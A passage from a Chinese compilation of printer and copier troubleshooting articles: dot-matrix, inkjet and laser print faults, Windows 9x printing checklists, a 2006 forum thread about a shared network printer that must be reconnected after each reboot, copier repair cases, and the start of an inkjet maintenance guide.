    另外，激光打印机的感光鼓不旋转，则不会有影像生成并传到纸上。断开打印机电源，取出墨粉盒，打开盒盖上的槽口，在感光鼓的非感光部位做个记号后重新装入机内。开机运行一会儿，再取出检查记号是否移动了，即可判断感光鼓是否工作正常。如果墨粉不能正常供给或激光束被挡住，也会出现打印空白纸的现象。因此，应检查墨粉是否用完、墨盒是否正确装入机内、密封胶带是否已被取掉或激光照射通道上是否有遮挡物。需要注意的是，检查时一定要将电源关闭，因为激光束可能会损坏操作者的眼睛。

    二、打印纸输出变黑

    对于针式打印机，引起该故障的原因是色带脱毛、色带上油墨过多、打印头脏污、色带质量差和推杆位置调得太近等，检修时应首先调节推杆位置，如故障不能排除，再更换色带，清洗打印头，一般即可排除故障；对于喷墨打印机，应重点检查喷头是否损坏、墨水管是否破裂、墨水的型号是否正常等；对于激光打印机，则大多是由于电晕放电丝失效或控制电路出现故障，使得激光一直发射，造成打印输出内容全黑。因此，应检查电晕放电丝是否已断开或电晕高压是否存在、激光束通路中的光束探测器是否工作正常。

    三、打印字符不全或字符不清晰

    对于喷墨打印机，可能有两方面原因，墨盒墨尽、打印机长时间不用或受日光直射而导致喷嘴堵塞。解决方法是可以换新墨盒或注墨水，如果墨盒未用完，可以断定是喷嘴堵塞：取下墨盒（对于墨盒喷嘴不是一体的打印机，需要取下喷嘴），把喷嘴放在温水中浸泡一会儿，注意一定不要把电路板部分浸在水中，否则后果不堪设想。

    对于针式打印机，可能有以下几方面原因：打印色带使用时间过长；打印头长时间没有清洗，脏物太多；打印头有断针；打印头驱动电路有故障。解决方法是先调节一下打印头与打印辊间的间距，故障不能排除，可以换新色带，如果还不行，就需要清洗打印头了。方法是：卸掉打印头上的两个固定螺钉，拿下打印头，用针或小钩清除打印头前、后夹杂的脏污，一般都是长时间积累的色带纤维等，再在打印头的后部看得见针的地方滴几滴仪表油，以清除一些脏污，不装色带空打几张纸，再装上色带，这样问题基本就可以解决，如果是打印头断针或是驱动电路问题，就只能更换打印针或驱动管了。

    四、打印字迹偏淡

    对于针式打印机，引起该类故障的原因大多是色带油墨干涸、打印头断针、推杆位置调得过远，可以用更换色带和调节推杆的方法来解决；对于喷墨打印机，喷嘴堵塞、墨水过干、墨水型号不正确、输墨管内进空气、打印机工作温度过高都会引起本故障，应对喷头、墨水盒等进行检测维修；对于激光打印机，当墨粉盒内的墨粉较少，显影辊的显影电压偏低和墨粉感光效果差时，也会造成打印字迹偏淡现象。此时，取出墨粉盒轻轻摇动，如果打印效果无改善，则应更换墨粉盒或调节打印机墨粉盒下方的一组感光开关，使之与墨粉的感光灵敏度匹配。

    五、打印时字迹一边清晰而另一边不清晰

    此现象一般出现在针式打印机上，喷墨打印机也可能出现，不过概率较小，主要是打印头导轨与打印辊不平行，导致两者距离有远有近所致。解决方法是可以调节打印头导轨与打印辊的间距，使其平行。具体做法是：分别拧松打印头导轨两边的调节片，逆时针转动调节片减小间隙，最后把打印头导轨与打印辊调节到平行就可解决问题。不过要注意调节时调对方向，可以逐渐调节，多打印几次。

    六、打印纸上重复出现污迹

    针式打印机重复出现脏污的故障大多是由于色带脱毛或油墨过多引起的，更换色带盒即可排除；喷墨打印机重复出现脏污是由于墨水盒或输墨管漏墨所致；当喷嘴性能不良时，喷出的墨水与剩余墨水不能很好断开而处于平衡状态，也会出现漏墨现象；而激光打印机出现此类现象有一定的规律性，由于一张纸通过打印机时，机内的12种轧辊转过不止一圈，最大的感光鼓转过2~3圈，送纸辊可能转过10圈，当纸上出现间隔相等的污迹时，可能是由脏污或损坏的轧辊引起的。


打印机十大共性故障解决方法

《一键清理系统垃圾》

打印机十大共性故障解决方法

打印机已是我们现代办公必备的设备，可以说它的使用大大减轻了我们的劳动强度，提高了工作效率，使办公环境更加轻松。可是由于各种原因，打印机在使用一段时间后经常出现这样或那样的故障，下面就将打印机经常出现的十个故障的检修方法与技巧介绍给大家，希望能够对大家使用和维修打印机有所帮助。

    一、打印机输出空白纸

    对于针式打印机，引起打印纸空白的原因大多是由于色带油墨干涸、色带拉断、打印头损坏等，应及时更换色带或维修打印头；对于喷墨打印机，引起打印空白的故障大多是由于喷嘴堵塞、墨盒没有墨水等，应清洗喷头或更换墨盒；而对于激光打印机，引起该类故障的原因可能是显影辊未吸到墨粉(显影辊的直流偏压未加上)，也可能是感光鼓未接地，使负电荷无法向地释放，激光束不能在感光鼓上起作用。

    另外，激光打印机的感光鼓不旋转，则不会有影像生成并传到纸上。断开打印机电源，取出墨粉盒，打开盒盖上的槽口，在感光鼓的非感光部位做个记号后重新装入机内。开机运行一会儿，再取出检查记号是否移动了，即可判断感光鼓是否工作正常。如果墨粉不能正常供给或激光束被挡住，也会出现打印空白纸的现象。因此，应检查墨粉是否用完、墨盒是否正确装入机内、密封胶带是否已被取掉或激光照射通道上是否有遮挡物。需要注意的是，检查时一定要将电源关闭，因为激光束可能会损坏操作者的眼睛。

    二、打印纸输出变黑

    对于针式打印机，引起该故障的原因是色带脱毛、色带上油墨过多、打印头脏污、色带质量差和推杆位置调得太近等，检修时应首先调节推杆位置，如故障不能排除，再更换色带，清洗打印头，一般即可排除故障；对于喷墨打印机，应重点检查喷头是否损坏、墨水管是否破裂、墨水的型号是否正常等；对于激光打印机，则大多是由于电晕放电丝失效或控制电路出现故障，使得激光一直发射，造成打印输出内容全黑。因此，应检查电晕放电丝是否已断开或电晕高压是否存在、激光束通路中的光束探测器是否工作正常。

    三、打印字符不全或字符不清晰

    对于喷墨打印机，可能有两方面原因，墨盒墨尽、打印机长时间不用或受日光直射而导致喷嘴堵塞。解决方法是可以换新墨盒或注墨水，如果墨盒未用完，可以断定是喷嘴堵塞：取下墨盒（对于墨盒喷嘴不是一体的打印机，需要取下喷嘴），把喷嘴放在温水中浸泡一会儿，注意一定不要把电路板部分浸在水中，否则后果不堪设想。

    对于针式打印机，可能有以下几方面原因：打印色带使用时间过长；打印头长时间没有清洗，脏物太多；打印头有断针；打印头驱动电路有故障。解决方法是先调节一下打印头与打印辊间的间距，故障不能排除，可以换新色带，如果还不行，就需要清洗打印头了。方法是：卸掉打印头上的两个固定螺钉，拿下打印头，用针或小钩清除打印头前、后夹杂的脏污，一般都是长时间积累的色带纤维等，再在打印头的后部看得见针的地方滴几滴仪表油，以清除一些脏污，不装色带空打几张纸，再装上色带，这样问题基本就可以解决，如果是打印头断针或是驱动电路问题，就只能更换打印针或驱动管了。

    四、打印字迹偏淡

    对于针式打印机，引起该类故障的原因大多是色带油墨干涸、打印头断针、推杆位置调得过远，可以用更换色带和调节推杆的方法来解决；对于喷墨打印机，喷嘴堵塞、墨水过干、墨水型号不正确、输墨管内进空气、打印机工作温度过高都会引起本故障，应对喷头、墨水盒等进行检测维修；对于激光打印机，当墨粉盒内的墨粉较少，显影辊的显影电压偏低和墨粉感光效果差时，也会造成打印字迹偏淡现象。此时，取出墨粉盒轻轻摇动，如果打印效果无改善，则应更换墨粉盒或调节打印机墨粉盒下方的一组感光开关，使之与墨粉的感光灵敏度匹配。

    五、打印时字迹一边清晰而另一边不清晰

    此现象一般出现在针式打印机上，喷墨打印机也可能出现，不过概率较小，主要是打印头导轨与打印辊不平行，导致两者距离有远有近所致。解决方法是可以调节打印头导轨与打印辊的间距，使其平行。具体做法是：分别拧松打印头导轨两边的调节片，逆时针转动调节片减小间隙，最后把打印头导轨与打印辊调节到平行就可解决问题。不过要注意调节时调对方向，可以逐渐调节，多打印几次。

    六、打印纸上重复出现污迹

    针式打印机重复出现脏污的故障大多是由于色带脱毛或油墨过多引起的，更换色带盒即可排除；喷墨打印机重复出现脏污是由于墨水盒或输墨管漏墨所致；当喷嘴性能不良时，喷出的墨水与剩余墨水不能很好断开而处于平衡状态，也会出现漏墨现象；而激光打印机出现此类现象有一定的规律性，由于一张纸通过打印机时，机内的12种轧辊转过不止一圈，最大的感光鼓转过2~3圈，送纸辊可能转过10圈，当纸上出现间隔相等的污迹时，可能是由脏污或损坏的轧辊引起的。

    七、打印头移动受阻，停下长鸣或在原处震动

    这主要是由于打印头导轨长时间滑动会变得干涩，打印头移动时就会受阻，到一定程度就会使打印停止，如不及时处理，严重时可以烧坏驱动电路。解决方法是在打印导轨上涂几滴仪表油，来回移动打印头，使其均匀分布。重新开机后，如果还有受阻现象，则有可能是驱动电路烧坏，需要拿到维修部了。

    八、打印机不打印

    引起打印机不打印的故障原因有很多种，有打印机方面的，也有计算机方面的。以下分别进行介绍：

    1. 检查打印机是否处于联机状态。在大多数打印机上“OnLine”按钮旁边都有一个指示联机状态的灯，正常情况下该联机灯应处于常亮状态。如果该指示灯不亮或处于闪烁状态，则说明联机不正常，重点检查打印机电源是否接通、打印机电源开关是否打开、打印机电缆是否正确连接等。如果联机指示灯正常，关掉打印机，然后再打开，看打印测试页是否正常。

    2. 检查打印机是否已设置为默认打印机。点击“开始/设置/打印机”，检查当前使用的打印机图标上是否有一黑色的小钩，然后将打印机设置为默认打印机。如果“打印机”窗口中没有使用的打印机，则点击“添加打印机”图标，然后根据提示进行安装。

    3. 检查当前打印机是否已设置为暂停打印。方法是在“打印机”窗口中用右键单击打印机图标，在出现的下拉菜单中检查“暂停打印”选项上是否有一小钩，如果选中了“暂停打印”请取消该选项。

    4. 在“记事本”中随便键入一些文字，然后单击“文件”菜单上的“打印”。如果能够打印测试文档，则说明使用的打印程序有问题，重点检查WPS、CCED、Word或其他应用程序是否选择了正确的打印机，如果是应用程序生成的打印文件，请检查应用程序生成的打印输出是否正确。

    5. 检查计算机的硬盘剩余空间是否过小。如果硬盘的可用空间低于10MB则无法打印，检查方法是在“我的电脑”中用右键单击安装Windows的硬盘图标，选择“属性”，在“常规”选项卡中检查硬盘空间，如果硬盘剩余空间低于10MB，则必须清空“回收站”，删除硬盘上的临时文件、过期或不再使用的文件，以释放更多的空间。

    6. 检查打印机驱动程序是否合适以及打印配置是否正确。在“打印机属性”窗口中“详细资料”选项中检查以下内容：在“打印到以下端口”选择框中，检查打印机端口设置是否正确，最常用的端口为“LPT1(打印机端口)”，但是有些打印机却要求使用其他端口；如果不能打印大型文件，则应重点检查“超时设置”栏目的各项“超时设置”值，此选项仅对直接与计算机相连的打印机有效，使用网络打印机时则无效。

    7. 检查计算机的BIOS设置中打印机端口是否打开。BIOS中打印机使用端口应设置为“Enable”，有些打印机不支持ECP类型的打印端口信号，应将打印端口设置为“Normal、 ECP+EPP”方式。

    8. 检查计算机中是否存在病毒，若有需要用杀毒软件进行杀毒。

    9. 检查打印机驱动程序是否已损坏。可用右键单击打印机图标，选择“删除”，然后双击“添加打印机”，重新安装打印机驱动程序。

    10. 打印机进纸盒无纸或卡纸，打印机墨粉盒、色带或碳粉盒是否有效，如无效，则不能打印。

    九、打印机卡纸或不能走纸

    打印机最常见的故障是卡纸。出现这种故障时，操作面板上指示灯会发亮，并向主机发出一个报警信号。出现这种故障的原因有很多，例如纸张输出路径内有杂物、输纸辊等部件转动失灵、纸盒不进纸、传感器故障等，排除这种故障的方法十分简单，只需打开机盖，取下被卡的纸即可，但要注意，必须按进纸方向取纸，绝不可反方向转动任何旋钮。

    如果经常卡纸，就要检查进纸通道，清除输出路径的杂物，纸的前部边缘要刚好在金属板的上面。检查出纸辊是否磨损或弹簧松脱，压力不够，即不能将纸送入机器。出纸辊磨损，一时无法更换时，可用缠绕橡皮筋的办法进行应急处理。缠绕橡皮筋后，增大了搓纸摩擦力，能使进纸恢复正常。此外，装纸盘安装不正常，纸张质量不好(过薄、过厚、受潮)，也会造成卡纸或不能取纸的故障。

    十、打印出现乱字符

    无论是针式打印机、喷墨打印机还是激光打印机出现打印乱码现象，大多是由于打印接口电路损坏或主控单片机损坏所致，而实际检修中发现，打印机接口电路损坏的故障较为常见，由于接口电路采用微电源供电，一旦接口带电拔插产生瞬间高压静电，就很容易击穿接口芯片，一般只要更换接口芯片，该类故障即可排除。另外，字库还没有正确载入打印机也会出现这种现象。


打印机竖线打印不直的解决方法

《一键清理系统垃圾》

打印机竖线打印不直的解决方法

当你打印表格时，是否发现所打印的表格的竖线有不直的现象呢？如果有，那说明你的打印机打印头的对齐性差了。现在我们以“STAR AR3200+”打印机为例，介绍一下它的校正方法：
    1.关闭打印电源，装好打印纸，最好是装上连续纸。
    2.同时按下打印机控制面板上的“装纸/出纸/退纸”和“联机”按钮后开机。
    此时，打印机打印出一张测试纸，有对图像、高速西文、高密西文、高速汉字、高密汉字等的测试情况，测试结果用几根竖线体现，如果竖线的上半部分与下半部分对不齐，则表示此项需要校正。如果竖线的下半部分向左偏，则按一下打印机控制面板上的“字间空距”按钮，将此竖线的下半部分向右边调，直到与上半部分对齐为止；同样，如果竖线的下半部分向右偏，则按一下打印机控制面板上的“宋体”按钮，将此坚线的下半部分向左边调，直到与上半部分对齐为止。等你全部调试完后，按“联机”按钮保存设置并退出测试。然后关闭打印机电源，重新启动，再调出你的表格打印一下试试，怎么样？效果不错吧！这里顺便说一下，不同类型的打印机的校正方法可能略有不同，别的类型就请各位自己试试吧。


打印机无法打印的故障处理

《一键清理系统垃圾》

打印机无法打印的故障处理

    “无法打印”大多是由于打印机使用、安装、设置不当造成的，病毒、打印机损坏、打印机端口有故障也会导致打印机无法打印。如果打印机在　Windows 9x中无法打印，可按如下步骤检查处理：
    1．首先检查打印机是否处于联机状态，在大多数打印机上，“OnLine”按钮旁边都有一个指示联机状态的小灯，正常情况该联机指示灯应处于常亮状态。如果该指示灯不亮或处于闪烁状态，说明联机不正常。请检查打印机电源是否接通、打印机电源开关是否打开、打印机电缆是否正确连接等。
    2．如果联机指示灯显示联机正常，请先关掉打印机，然后再打开，重新打印文档试试。此操作能清除打印机内存中存放的打印文档数据并能解决许多问题，但有时这种方法会导致打印输出混乱，需重新启动系统后才可正常打印。
    3．检查是否已将打印机设置为默认打印机，方法是选择“开始/设置/打印机”，打开“打印机”窗口，检查当前使用的打印机图标上是否有一黑色的小钩，如果没有，用右键单击打印机图标，选择“设为默认值”，将打印机设置为默认打印机。如果“打印机”窗口没有当前使用的打印机，请双击“添加打印机”图标，然后根据提示安装打印机。
    4．检查是否将当前打印机设置为暂停打印，方法是在“打印机”窗口用右键单击打印机图标，在出现的下拉菜单中，检查“暂停打印”选项上是否有一小钩（如^07030406a^1）。如果选中了“暂停打印”选项，请取消该选项上的小钩，然后重新打印。
    5．在“记事本”或“写字板”中键入几行文字，然后单击“文件”菜单上的“打印”。如果能够打印测试文档，可能是你使用的程序有问题，请在你使用的WPS、WORD或其它应用程序中检查是否选择了正确的打印机，如果是应用程序生成的打印文件，请检查程序生成的打印输出是否正确。
    6．硬盘剩余空间过小会导致打印机无法打印，请检查硬盘可用空间是否低于10MB，方法是在“我的电脑”中用右键单击安装Windows98的硬盘图标（通常是C盘），选择“属性”，打开当前硬盘属性窗口，在“常规”选项卡检查硬盘空间，如果硬盘剩余空间低于10MB，则必须清空“回收站”、删除硬盘上的临时文件、删除硬盘上的过期文件或已归档文件、删除从不使用的程序，以释放更多的空间才能打印。
    7．检查使用的打印机驱动程序是否合适以及配置是否正确，方法是在“打印机”窗口用右键单击打印机图标，在出现的下拉菜单中，选择“属性”选项，打开“打印机属性”窗口，在“详细资料”选项中检查以下内容（如^07030406b^2）：
    （1）在“打印到以下端口”选择框中，检查打印机端口设置是否正确，最常用的端口设置为“LPT1：打印机端口”，但是有些打印机却要求使用其他端口。
    （2）在“使用以下驱动程序打印”选择框中，检查使用的驱动程序是否合适。
    （3）如果是打印大型文件时出现故障，请在“超时设置”栏目增加各项“超时设置”值。此选项仅对直接与计算机相连的打印机有效，使用网络打印机时无效。
    8．检查BIOS中打印机端口是否打开，BIOS中打印机使用端口应设置为“Enable”，并注意早期的有些打印机不支持ECP类型的打印端口信号，这时应将打印端口设置为“Normal”、“SPP”、“ECP＋EPP”方式试试。
    9．检查是否存在病毒，用杀毒软件杀毒试试。
    10．检查打印机电缆连接是否插对插牢，必须确保连接计算机和打印机的电缆两端都插对插牢。如果你使用了打印机切换设备（如并口扫描仪、打印机共享器），请不经过切换设备，将打印机直接与计算机相连，然后尝试进行打印。如果不经过切换设备能正常打印，则表明切换设备有问题。
    11．检查打印机驱动程序是否已损坏，“打印机驱动程序”损坏会导致打印机无法打印，可用右键单击打印机图标，选择“删除”，然后双击“添加打印机”，重新安装打印机驱动程序，然后重新打印。如果重新安装后能正常工作，说明问题出已损坏的打印机驱动程序。
    12．检查打印机是否有打印纸、色带和其他必需品，如进纸盒中是否有纸，打印机是否卡纸，粉盒、色带或墨粉是否有效。
    如经过上述检查还是无法打印，故障原因可能是下列三种之一：一是打印机电缆断线，二是打印机损坏，三是打印机端口有故障。打印机电缆断线和打印机损坏可用替换法检查，如果是打印机出现故障，请将打印机送修；如果是主板打印机端口损坏，可另加装一块多功能卡，在BIOS中关闭主板打印机端口实施打印。
    总的来说，Windows 9x中“无法打印”故障解决起来不是很困难，但还需要你去实践，方能一一排除故障。


非常棘手的一个打印机共享问题

《一键清理系统垃圾》

非常棘手的一个打印机共享问题

一台电脑(网络名：dayin)安装好打印机，并共享后，另一台电脑进行连接安装网络打印机，并能打印，但是这台电脑重起后就不能打印了，必须再重新连接一下那台安装打印机的电脑才能打印（开始/运行/　\\dayin　)，如果不重新连接，就会提示有错误发生：无法建立到打印机的连接！

以后每次都需要这样重新连接一下那台电脑才能打印，这是怎么回事啊？求助高手！！！
--------------------------------------------------------------------------------
作者: 279674305　　时间: 2006-6-13 11:22　　 标题: 天堂有路你不走,,哎!!!!!!

哎,这个问题不好说,因为有很多原因的
你的网络连接是否正常,你的网上邻居里看到的机子会不会出现有时间看不到
还有的网络协议啊,什么的有没有添加===这个问题很多种你要自己去检查一下了
--------------------------------------------------------------------------------
作者: czhyn　　时间: 2006-6-13 12:40　　 标题: 回复！！！

网络协议安装好了，局域网也是畅通的！我都安装上了！
--------------------------------------------------------------------------------
作者: dding007　　时间: 2006-6-13 14:15　　 标题: 哈哈，这个问题最简单！~~~

我是sunray公司的网管，我也遇到你上述的问题，我是这样解决的：

将打印共享的那台电脑"Guest"用户打开，你每次都要登录，就是你禁用了该guest用户的原因。哈哈，去试试吧~~　如果不明白，请问WO，QQ：56255099
--------------------------------------------------------------------------------
作者: ybb0　　时间: 2006-6-14 10:13

同上了,是这个问题
--------------------------------------------------------------------------------
作者: 蜘蛛网管　　时间: 2006-6-14 13:01

QUOTE:
原帖由 dding007 于 2006-6-13 14:15 发表
我是sunray公司的网管，我也遇到你上述的问题，我是这样解决的：

将打印共享的那台电脑"Guest"用户打开，你每次都要登录，就是你禁用了该guest用户的原因。哈哈，去试试吧~~　如果不明白，请问WO，Q ...
还有　就是 你共享的那台机子里　把其他机子里的用户 全部添加进去　就可以了

如果全部是administrator 的话 就 免了
--------------------------------------------------------------------------------
作者: leostarlx　　时间: 2006-6-14 16:37

连一下不费工夫吧。。。说起来好像我们公司的打印机也是这个情况。。
--------------------------------------------------------------------------------
作者: liguancong　　时间: 2006-6-25 18:09

有在客户端安装嘛？
--------------------------------------------------------------------------------
作者: ybb0　　时间: 2006-6-26 10:03

网络通信问题....
--------------------------------------------------------------------------------
作者: adny008　　时间: 2006-6-26 13:55

6楼的说的有理
--------------------------------------------------------------------------------
作者: 我要学好维修　　时间: 2006-6-26 14:03

只要刷新一下就可以了，不需要重新安装的
--------------------------------------------------------------------------------
作者: 暗夜邪舞　　时间: 2006-6-26 14:09

QUOTE:
原帖由 dding007 于 2006-6-13 14:15 发表
我是sunray公司的网管，我也遇到你上述的问题，我是这样解决的：

将打印共享的那台电脑"Guest"用户打开，你每次都要登录，就是你禁用了该guest用户的原因。哈哈，去试试吧~~　如果不明白，请问WO，Q ...
别的型号的打印机没发现有过这种情况，是这种型号的打印机才会出现的吗？
--------------------------------------------------------------------------------
作者: ctiger197418　　时间: 2006-6-27 22:12

同意三楼的，


复印机故障多例

《一键清理系统垃圾》

复印机故障多例

   故障1
   故障现象：一台理光ＦＴ－４４９５复印机，近日因墨粉用完，更换了墨粉，使用不 久无粉指示灯仍旧闪亮，提示墨粉不够，主电机空转不停，不能进行复印。
   故障分析及排除：根据故障现象，估计是墨粉盒没有安装到位造成的，重装墨粉盒， 并检查墨粉量无误后，开机再试，故障依旧。打开前盖观察供粉机构的传动情况，发现转动供粉辊齿轮能带动传动轮及搅粉齿轮转动，说明故障出现在搅粉齿轮到墨粉盒的传动部 件上。取出墨粉盒，发现墨粉盒与搅粉齿轮之间的啮合齿轮扭断，造成墨粉盒内的搅粉辊不能转动，墨粉盒不能供粉，机器无法工作，取回原来的无粉墨粉盒，将墨粉全部倒入原 来的墨粉盒内，重装墨粉盒，故障排除。
   小结：更换墨粉盒时，必须先轻轻摇动新盒，使墨粉分布均匀，并转动搅粉辊，使之转动灵活，无死点，方可安装。否则，将会造成搅粉辊啮合齿轮扭断的现象，造成不必要的损失。
   故障2
   故障现象：一台理光ＦＴ４４９０复印机，使用近一年，复印Ａ３、Ｂ４纸张正常， 但复印Ａ４、Ｂ５纸时却出现卡纸现象，并且操作面板显示卡纸位置总是在“Ｂ”处（定 影部件处）。
   故障分析与维修：由于复印Ａ３、Ｂ４纸正常，说明复印机电气部分没有故障，估计 问题出在机械部分，而Ａ３与Ａ４、Ｂ４与Ｂ５纸宽度相同，仅长度不同而已。仔细观察 复印过程，发现复印Ａ４或Ｂ５纸时，当纸从硒鼓上完全分离下来后掉到输纸皮带上即停止运动，不能继续往定影装置入口处传送，有时即使能运动，但明显速度很慢，导致显影 后的纸不能及时传送到定影装置，所以显示卡纸；而复印Ａ３或Ｂ４纸时，当纸的后部被从硒鼓上分离下来时，因为纸张较长，其前端已通过输纸皮带及时到达定影装置入口处， 经过定影辊和压力辊的间隙被送入定影装置，因而复印成功。由此看来，故障出在输纸部位。正常情况下，从硒鼓上分离下来已显影的纸张掉在输纸皮带上后，皮带下的负压风扇 的吸力将其吸到输纸皮带并及时传送到定影装置，否则出纸传感器不能及时检测到出纸就显示卡纸。
   造成此故障的原因有三：
   一是负压风扇的电机损坏导致风扇不转，使得纸落在输送皮带上后与皮带间没有足够 的摩擦力，输纸失败，引起卡纸；
   二是驱动输纸皮带的齿轮机构故障，导致输纸皮带不转 ；
   三是输纸皮带与主动轮间的摩擦力减小，输纸皮带打滑。经多次复印观察，
   发现属于第 三种情况，于是拆除墨粉收集瓶，取下输纸部件及负压风扇（装在一起），从输纸部件上 拆下输纸皮带，发现其内侧确已很光滑，更换输纸皮带后（应急处理可将输纸皮带内侧翻转过来照原样装回），将输纸部件及负压风扇原样装回（要确保输纸齿轮与驱动齿轮啮合 ），预热试复印，故障排除。
   故障3
   故障现象：一台施乐５５１８复印机，使用一段时间后，废粉盒温，显示“Ｊ９”代 码。取下废粉盒，倒掉废粉后重新装上，却一直显示“Ｊ９”代码（已重新开启电源）。
   排除方法：本复印机判断废粉是否装满是采用光电检测的，废粉盒后上部有一凸出部 分，靠近光电检测灯；废粉积聚升到凸出部分时，则检测到废粉已满，并显示“Ｊ９”代码。取下废粉盒仔细观察，发现凸出部分里层有些墨粉，即揭掉盒盖，用镊子夹住绒布擦 掉墨粉（亦可用纸），然后再装上，状态码“Ｊ９”立即消除。
   故障4
   故障现象：一台佳能３０２０复印机，使用近两年后，突然出现“咔哒咔哒”的机械 噪音，尚能正常复印。几天后，噪音加大，出现复印品全白、纸张卡于硒鼓和输纸部件之 间的故障现象。
   故障分析及排除：经检查，发现硒鼓一端的黑色三星状塑料部件严重磨损，电机转动 时，其主轴上带弹簧的销子在塑料部件上打滑（产生噪音），无法带动硒鼓一起转动，硒鼓无法曝光及形成影像，纸张不能与硒鼓分离，因而产生复印品全白和卡纸。
   更换一个新的硒鼓，上述故障现象消失。复印了２０００张后，机械噪音重新出现， 为防硒鼓再次损坏，立即停机，取出硒鼓组件，发现塑料部件又有轻微的磨痕，说明故障并未真正排除。
   用拇指在硒鼓两端用力转动，发现硒鼓很紧，估计可能是硒鼓组件中的某个部件运行 不畅。小心取下硒鼓，用一张干净纸包好，放于避光处。用手转动废粉收集盒右侧的齿轮，感觉转动困难，看来故障出在废粉收集盒内。取下连接废粉盒内叶轮的塑料齿轮，发现 齿轮轴上的毛毡密封垫因长期吸粘碳粉已碳化。取下毛毡垫，将别的部件全部照原样装上，用手转动硒鼓，非常流畅，说明问题出在毛毡垫上。小心除去垫上的碳粉硬块，使毛毡 垫重新变得柔软有弹性，装上后开机，噪音消失，复印效果很好。
   小结：使用复印机时，如发现有异常的情况，即使暂时能够复印，也要立即停机，检 查造成异常的原因，及时排除，以免造成更大的损坏。
   故障5
   故障现象：一台Ｃａｎｏｎ　ＮＰ２０２０复印机，复印时，出现图像全白，连试几次，仍如此。
   检修过程：Ｃａｎｏｎ　ＮＰ２０２０无故障代码显示，故障原因一时无法确定。为 了观察复印过程，将复印机前盖打开，用弯嘴钳压住门开关开机复印。发现复印过程中，暴光灯、显影驱动等部件均运转正常。中途突然松开门开关，卸下硒鼓架观察，硒鼓表面 上毫无印迹，据此可以说明故障关键是在充电部分，怀疑是一次充电电极丝断了，拆开电极座检查，发现完好。
   检查充电高压电路部分，因无现成电路图。打开后盖，在复印过程中，用北欧表测量 放电电压为６０００Ｖ左右，基本正常，估计是充电器绝缘架漏电所致。从硒鼓架下卸下电极座，发现绝缘架两端有轻微烧焦痕迹，伴有焦味，且有潮湿墨粉粘附在绝缘架内侧。 为了进一步证明是漏电所致。将硒鼓拆下，因硒鼓住视线，无法看清是否漏电，用塑料将电极座吊在位置，压住门开关再复印，果然发现绝缘架两端有火花迸出。将电极座用吸水 纸擦干墨粉，并用小刀沿烧焦痕迹刮削，最后用绝缘胶带沿槽填好，开机复印后仍不尽如意，只复印出一部分，漏电仍很严重。换上新的绝缘架，复印机恢复正常。
   小结：该机由于湿度大和漏粉，且日常保养工作做得不好，最终造成电极架碳化并产 生严重漏电。所以复印机工作环境有条件应打开空调，经常开机烘干。同时更要做好日常清洁维护工作，这样才能延长复印机的使用寿命。


激光打印机打印纸上重复出现脏迹的处理

《一键清理系统垃圾》

激光打印机打印纸上重复出现脏迹的处理

     一台HP激光打印机，当纸通过打印机时，机内的12种轧辊转过不止一圈。最大的感光鼓转过2-3圈，送纸辊可转过10多圈。最近纸上出现了间隔相等的脏迹，我估计可能是由脏污或损坏的轧辊引起的。

    解决办法：假设某一轧辊上沾有污迹，如脏迹相距较近，可能是小轧辊形成的；相距较远时，就应检查大一些的轧辊。测量出脏迹之间的距离，再用下式算出引起脏迹的轧辊直径:轧辊直径=脏迹距离/π。对于HP激光打印机，感光鼓直径为3.75英寸(91mm)，显影辊直径为2英寸(51mm)，定影辊直径为3英寸(76mm)。最后发现显影辊脏了，清洁以后，故障解决。


激光打印机的常见故障

《一键清理系统垃圾》

激光打印机的常见故障

  症状：卡纸。激光打印机最常见的故障是卡纸。出现这种故障时，操作面板上指示灯会发光，并向主机发出一个报警信号。
  治疗方法：只需打开机盖,取下被卡的纸即可。但要注意，必须按进纸方向取纸,绝不可反方向转动任何旋钮。如果经常卡纸，就要检查进纸通道，纸的前部边缘就刚好在金属板的上面。 取纸辊是激光打印最易磨损的部分。当盛纸盘内纸张正常，而无法取纸时，往往是取纸辊磨损或弹簧松脱。压力不够,不能将纸送入机器。取纸辊磨损，一时无法更换时,可用缠绕橡皮筋的办法进行应急处理。缠绕橡皮筋后，增大了搓纸摩擦力，能使进纸恢复正常。此外，盛纸盘安装不正,纸张质量不好（过薄、过厚、受潮），也都可能造成卡纸或不能取纸的故障。
  激光打印机输出的字迹偏淡
  病因分析：墨粉盒内的墨粉较少、显影辊的显影电压偏低和墨粉未被极化带电而无法转移到感光鼓上，都会造成打印字迹偏淡现象。
  治疗方法：取出墨粉盒轻轻摇动，如打印效果没有改善，就应更换墨粉盒或请专业维修人员进行处理。此外，有些打印机的墨粉盒下方有一组感光开关,用来调节激光的强度，使其与墨粉的感光灵敏度很好匹配。如果这些开关设置不正确，也会造成打印字迹偏淡。
  激光打印机输出空白
  病因分析：可能是显影辊未吸到墨粉 （显影辊的直流偏压未加上），也可能是感光鼓未接地，由于负电荷无法向地泄放,激光束不能在感光鼓上起作用，因而在纸上也就无法印出文字来。感光鼓不旋转,也不会有影像生成并传到纸上，故必须确定感光鼓能否正常转动。
  治疗方法：断开打印机电源，取出墨粉盒，打开盒盖上的槽口，在感光鼓的非感光部位作个记号后重新装入机内。开机运行一会儿，再取出检查记号是否移动了，即可判断感光鼓是否工作正常。如果墨粉不能正常供给或激光束被挡住，也会造成白纸。因此，应检查墨粉是否用完、墨盒是否正确装入机内、密封胶带是否已被取掉或激光照射通道上是否有遮挡物。需要注意的是，检查时一定要将电源关断，因为激光束可能会损坏你的眼睛。


家用喷墨打印机维护及保养

《一键清理系统垃圾》

家用喷墨打印机维护及保养

    购买了家用喷墨打印机的朋友，大都希望打印机工作稳定，花在耗材上的费用越少越好。俗话说“要想马儿跑，要将它喂饱”，我们只要掌握正确的使用方法，养成良好的使用习惯，我们完全可以善用好自己的打印机。

    一、养成关机好习惯
    家用喷墨打印机的面板一般都很简洁，通常只设置一、两个按钮(见图1)，有些甚至没有。这些按钮的功能无非是开关电源或启动打印自检步骤（也有部分家用喷墨打印机设置有三个以上按钮，能提供更多的功能）。使用时间一长，许多用户开始偷懒，经常懒得按电源按钮关闭打印机，不是直接拔掉电源插头，就是关断插线板开关。孰不知，这样做往往有害无益，我们在正常关机后机器会自动将打印头复位，同时为墨盒戴上“帽子”，防止墨水蒸发损失。而采用拔电源插头之类的“强行”关机方式，打印头往往来不及复位，顶端也无法盖住墨盒。因此极易造成打印头定位故障，墨水也很容易挥发损失，变粘稠的墨水还可能堵塞打印喷嘴。其结果必然是墨盒寿命减短，打印机出故障的机会更多。所以，我们一定要养成正确的关机习惯。

    二、不用劣质打印纸
